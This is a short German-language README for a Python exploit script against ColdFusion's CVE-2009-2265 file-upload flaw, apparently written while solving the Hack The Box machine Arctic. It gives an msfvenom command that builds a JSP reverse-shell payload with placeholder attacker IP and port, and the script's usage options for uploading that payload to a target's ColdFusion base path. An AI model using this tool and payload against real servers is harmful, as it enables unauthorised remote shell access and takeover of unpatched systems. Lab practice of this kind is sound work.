
coldfusion exploit basiert auf https://cvedetails.com/cve/CVE-2009-2265/
ColdFusion-Exploit basierend auf https://cvedetails.com/cve/CVE-2009-2265/
Der Hauptgrund, warum ich ein Python-Skript für diese spezielle CVE erstellt habe, war, dass die Metasploit-Version desselben bei mir nicht funktionierte, als ich versuchte, die HTB-Maschine Arctic zu lösen. Außerdem war es schön, ein wenig Python-Übung zu bekommen. Allerdings gibt es eine andere Python-Version desselben Exploits, die ursprünglich von Alexander Reid erstellt wurde, falls du seine Version bevorzugst.
Die Verwendung ist recht einfach:
Stelle sicher, dass du eine Payload-Datei erstellt hast.
z.B. mit msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
Verwendung: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
Verwendung: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
optionale Argumente:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-t TARGET Ziel-IP
-p PORT Ziel-Port
-f FILEPATH Pfad zur Datei mit dem Shellcode zum Hochladen
-b BASEPATH ColdFusion-Basispfad